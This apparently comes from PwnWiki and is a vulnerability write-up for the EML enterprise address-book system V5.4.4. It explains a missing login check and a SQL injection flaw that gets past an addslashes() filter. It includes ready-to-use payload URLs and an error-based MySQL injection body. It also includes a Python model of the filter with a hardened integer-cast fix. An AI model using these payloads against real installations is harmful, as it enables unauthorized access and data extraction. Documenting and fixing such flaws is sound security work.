EML企业通讯录管理系统经典版V5.4.4 Unauthorized Access & SQL Injection Vulnerability

From PwnWiki
Revision as of 12:27, 14 April 2021 by Pwnwiki

Unauthorized access

action/action.address.php

header("Content-type: text/html; charset=utf-8");

if(!defined('CORE'))exit("error!");  // only guards against direct file access, not against an anonymous visitor

// no session / login check follows: the action body below runs for any visitor
.....

The page never checks whether the user is logged in, so opening it yields ordinary-user privileges without authenticating. (The system also allows self-registration.)

SQL injection

lib/func.class.php

function _RunMagicQuotes(&$svar){
	// On PHP >= 5.4.0 get_magic_quotes_gpc() always returns FALSE, so this branch always runs
	if(!get_magic_quotes_gpc())	{
		if( is_array($svar) ){
			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
		}else{
			// addslashes() only escapes ' " \ and NUL; values used unquoted in SQL are not protected
			$svar = addslashes($svar);
		}
	}
	return $svar;
}

The filtering function _RunMagicQuotes checks whether magic_quotes_gpc is enabled; if it is, it relies on the GPC escaping, otherwise it escapes the value with addslashes(). Since PHP 5.4.0 get_magic_quotes_gpc() always returns FALSE, because the magic quotes feature was removed from PHP, so every request value goes through addslashes(). addslashes() only backslash-escapes single quotes, double quotes, backslashes and NUL bytes. The payloads below contain none of these characters, so the filter returns them unchanged; parameters such as pageNum and numPerPage that are placed into the query without surrounding quotes (as in a LIMIT clause) are therefore not protected at all.

Exploitation

Unauthorized access payload

http://192.168.116.138/eml/index.php?action=address

SQL injection payload

GET method, to confirm the injection exists (the `/1` in pageNum is not touched by addslashes() and breaks the query syntax; a database error in the response confirms the parameter reaches the query unfiltered):

http://192.168.116.138/eml/index.php?action=address&pageNum=/1

POST method (the action and pageNum stay in the URL; numPerPage is sent in the POST body):

http://192.168.116.138/eml/index.php?action=address&pageNum=0

POST body:

numPerPage=1 procedure analyse(1,extractvalue(rand(),concat(0x7e,version())));

This is an error-based payload: PROCEDURE ANALYSE is a MySQL clause that may follow LIMIT, and extractvalue() raises an XPath syntax error whose message embeds the result of version(). PROCEDURE ANALYSE was deprecated in MySQL 5.7 and removed in MySQL 8.0, so this particular payload only works against MySQL 5.x backends.
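As an added example (not code from the PwnWiki page or from the EML product), the following Python script models the _RunMagicQuotes() / addslashes() filter from lib/func.class.php on PHP 5.4+ and runs the two payloads from this page through it, beside a hardened version that casts the paging parameters to integers the way PHP's intval() would. It covers both the filter analysis above and the exploitation section. The query shape and the table name `address` are assumptions; the page does not show the real SQL, and the trailing `;` of the POST payload is dropped.

```python
import re

# Payloads taken from the page (the POST payload without its trailing ';')
PAGE_NUM_PROBE = "/1"
NUM_PER_PAGE_PAYLOAD = (
    "1 procedure analyse(1,extractvalue(rand(),concat(0x7e,version())))"
)


def addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape ' " \\ and NUL, nothing else."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def run_magic_quotes(svar):
    """Model of _RunMagicQuotes() on PHP >= 5.4: get_magic_quotes_gpc() is
    always FALSE, so every scalar is passed through addslashes(); arrays recurse."""
    if isinstance(svar, dict):
        return {k: run_magic_quotes(v) for k, v in svar.items()}
    if isinstance(svar, list):
        return [run_magic_quotes(v) for v in svar]
    return addslashes(str(svar))


def php_intval(s: str) -> int:
    """PHP intval() on a string: optional whitespace, sign and leading digits; else 0."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def survives_filter(value: str) -> bool:
    """True when the page's filter hands the value to the query unchanged."""
    return run_magic_quotes(value) == value


def build_vulnerable_query(params: dict) -> str:
    """Assumed (hypothetical) paging query: filtered values concatenated unquoted,
    which is the only way the page's quote-free payloads can work."""
    p = run_magic_quotes(params)
    return f"SELECT * FROM address LIMIT {p['pageNum']},{p['numPerPage']}"


def build_hardened_query(params: dict) -> str:
    """Hardened variant: integer cast (PHP intval() / (int)) plus range clamping,
    so only digits ever reach the LIMIT clause."""
    page = max(0, php_intval(params.get("pageNum", "0")))
    per_page = min(max(1, php_intval(params.get("numPerPage", "20"))), 100)
    return f"SELECT * FROM address LIMIT {page},{per_page}"


if __name__ == "__main__":
    attack = {"pageNum": PAGE_NUM_PROBE, "numPerPage": NUM_PER_PAGE_PAYLOAD}
    print("filter leaves probe intact:  ", survives_filter(PAGE_NUM_PROBE))
    print("filter leaves payload intact:", survives_filter(NUM_PER_PAGE_PAYLOAD))
    print("filter escapes a quoted one: ", not survives_filter("1' or '1'='1"))
    print("vulnerable:", build_vulnerable_query(attack))
    print("hardened:  ", build_hardened_query(attack))
```

The point the script makes is that escaping is the wrong tool for a numeric parameter: neither `/1` nor the `procedure analyse(...)` payload contains a character addslashes() acts on, so the "filter" is a no-op for them, while a quoted payload such as `1' or '1'='1` is escaped. The hardened query reduces both attack values to plain integers.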